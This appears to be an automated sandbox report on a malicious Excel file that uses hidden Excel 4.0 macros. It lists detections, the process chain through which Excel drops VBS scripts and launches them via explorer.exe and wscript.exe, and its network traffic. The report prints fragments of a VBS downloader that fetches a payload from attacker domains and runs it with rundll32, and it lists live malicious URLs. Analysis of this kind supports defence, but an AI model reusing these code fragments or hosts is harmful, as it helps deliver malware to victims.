Loading ...

Play interactive tourEdit tour

Analysis Report notif_7310.xls

Overview

General Information

Sample Name:notif_7310.xls
Analysis ID:289315
MD5:d8442d7a237852c47a1856950683fd08
SHA1:aa68573f3c9e97cc1df12b971de95905238c0547
SHA256:897174f7ae2c41ab945c74bf7b94dddc0e0ccdd3b7ee552bfe7fb812ca73ed1e

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected VBS Launcher Generic
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Injects code into the Windows Explorer (explorer.exe)
Microsoft Office drops suspicious files
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Unable to load, office file is protected or invalid

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1696 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • explorer.exe (PID: 896 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\OdThK9.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 2832 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\d6E6S0.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 2844 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\AK1.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2392 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2752 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\OdThK9.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 2816 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2948 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\d6E6S0.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 3036 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 3016 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\AK1.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\AK1.vbsJoeSecurity_VBSLauncherGenericYara detected VBS Launcher GenericJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: wscript.exe PID: 3016JoeSecurity_VBSLauncherGenericYara detected VBS Launcher GenericJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Office product drops script at suspicious locationShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1696, TargetFilename: C:\Users\user\AppData\Local\Temp\OdThK9.vbs

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: notif_7310.xlsVirustotal: Detection: 11%Perma Link

      Spreading:

      barindex
      Yara detected VBS Launcher GenericShow sources
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3016, type: MEMORY
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\AK1.vbs, type: DROPPED

      Software Vulnerabilities:

      barindex
      Document exploit detected (creates forbidden files)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\OdThK9.vbsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\d6E6S0.vbsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\AK1.vbsJump to behavior
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
      Source: global trafficDNS query: name: beautifulday.site
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.27.136.242:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.27.136.242:443

      Networking:

      barindex
      Potential malicious VBS script found (has network functionality)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: Gxyl.OpenGxyl.Type = 1Gxyl.Write DY1dSemt.ResponseBodyJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: Gxyl.OpenGxyl.Type = 1Gxyl.Write DY1dSemt.ResponseBodyJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: Gxyl.SaveToFile "C:\Users\user\AppData\Local\Temp\yWf6uFo.html",2Gxyl.CloseExit ForEnd IfNextJump to dropped file
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: unknownDNS traffic detected: queries for: beautifulday.site
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
      Source: wscript.exe, 00000007.00000002.2108684604.00000000055C7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: wscript.exe, 00000007.00000002.2108684604.00000000055C7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
      Source: explorer.exe, 00000002.00000002.2091267311.0000000001D60000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2218712932.0000000001CF0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2098477471.0000000001C60000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2225493406.0000000001DA0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000003.00000002.2219410864.0000000002860000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.2091356829.0000000001B40000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.2103422146.0000000001B80000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: wscript.exe, 00000007.00000002.2108684604.00000000055C7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: http://video.google.co.uk/?hl=en&tab=wv
      Source: wscript.exe, 00000007.00000002.2108684604.00000000055C7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000002.00000002.2091267311.0000000001D60000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2218712932.0000000001CF0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2098477471.0000000001C60000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2225493406.0000000001DA0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.2107712597.0000000004FF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: wscript.exe, 00000007.00000003.2101510043.0000000000339000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: http://www.google.co.uk/history/optout?hl=en
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: http://www.google.co.uk/preferences?hl=en
      Source: wscript.exe, 00000007.00000002.2108684604.00000000055C7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/&ec=GAZA
      Source: wscript.exe, 00000007.00000003.2101446234.0000000004C8B000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
      Source: wscript.exe, 00000007.00000002.2102016651.0000000000114000.00000004.00000040.sdmpString found in binary or memory: https://beautifulday.s
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/
      Source: wscript.exe, 00000007.00000002.2103257417.0000000000396000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.2101510043.0000000000339000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.php
      Source: wscript.exe, 00000007.00000002.2102279223.00000000002BC000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.php%
      Source: wscript.exe, 00000007.00000002.2102279223.00000000002BC000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.php.
      Source: wscript.exe, 00000007.00000002.2102279223.00000000002BC000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.php6
      Source: wscript.exe, 00000007.00000002.2103257417.0000000000396000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpN
      Source: wscript.exe, 00000007.00000002.2102279223.00000000002BC000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpT
      Source: wscript.exe, 00000007.00000002.2102279223.00000000002BC000.00000004.00000001.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpsk
      Source: wscript.exe, 00000007.00000003.2101743703.0000000002535000.00000004.00000040.sdmpString found in binary or memory: https://beautifulday.site/wp-index.phpz
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
      Source: wscript.exe, 00000007.00000002.2103257417.0000000000396000.00000004.00000001.sdmpString found in binary or memory: https://gomag.site/wp-index.php
      Source: wscript.exe, 00000007.00000003.2101446234.0000000004C8B000.00000004.00000001.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
      Source: wscript.exe, 00000007.00000003.2101446234.0000000004C8B000.00000004.00000001.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
      Source: wscript.exe, 00000007.00000003.2101446234.0000000004C8B000.00000004.00000001.sdmpString found in binary or memory: https://plusone.google.com/u/0
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/?tab=wj
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.co.uk/intl/en/about/products?tab=wh
      Source: wscript.exe, 00000007.00000002.2107673685.0000000004C6F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.co.uk/shopping?hl=en&source=og&tab=wf
      Source: wscript.exe, 00000007.00000003.2101626672.0000000000341000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
      Source: wscript.exe, 00000007.00000003.2101446234.0000000004C8B000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.2101504527.000000000032F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/setprefdomain?prefdom=GB&prev=https://www.google.co.uk/&sig=K_f7_BXS5
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: notif_7310.xlsInitial sample: WORKSPACE
      Microsoft Office drops suspicious filesShow sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\OdThK9.vbsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\d6E6S0.vbsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\AK1.vbsJump to behavior
      Potential malicious VBS script found (suspicious strings)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: Y0Teu = Array(N8h,Z02HZK0,Uk2ZOW,uUrnaAp)Dim DY1dSemt: Set DY1dSemt = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: Y0Teu = Array(N8h,Z02HZK0,Uk2ZOW,uUrnaAp)Dim DY1dSemt: Set DY1dSemt = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: Y0Teu = Array(N8h,Z02HZK0,Uk2ZOW,uUrnaAp)Dim DY1dSemt: Set DY1dSemt = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: Y0Teu = Array(N8h,Z02HZK0,Uk2ZOW,uUrnaAp)Dim DY1dSemt: Set DY1dSemt = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: Y0Teu = Array(N8h,Z02HZK0,Uk2ZOW,uUrnaAp)Dim DY1dSemt: Set DY1dSemt = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: Y0Teu = Array(N8h,Z02HZK0,Uk2ZOW,uUrnaAp)Dim DY1dSemt: Set DY1dSemt = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: HFpOu.Document.Application.ShellExecute "rundll32.exe","C:\Users\user\AppData\Local\Temp\yWf6uFo.html,DllRegisterServer","C:\Windows\System32",Null,0Jump to dropped file
      Source: notif_7310.xlsOLE indicator, VBA macros: true
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow title found: microsoft excel okthe workbook cannot be opened or repaired by microsoft excel because it is corrupt.
      Source: classification engineClassification label: mal100.spre.expl.evad.winXLS@16/10@2/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\05DE0000Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCB79.tmpJump to behavior
      Source: notif_7310.xlsOLE indicator, Workbook stream: true
      Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\OdThK9.vbs
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: notif_7310.xlsVirustotal: Detection: 11%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\OdThK9.vbs
      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\OdThK9.vbs'
      Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\d6E6S0.vbs
      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\d6E6S0.vbs'
      Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\AK1.vbs
      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\AK1.vbs'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\OdThK9.vbsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\d6E6S0.vbsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\AK1.vbsJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\OdThK9.vbs' Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\d6E6S0.vbs' Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\AK1.vbs' Jump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\explorer.exe TID: 2412Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2412Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2352Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2836Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2836Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2916Thread sleep time: -60000s >= -30000sJump to behavior
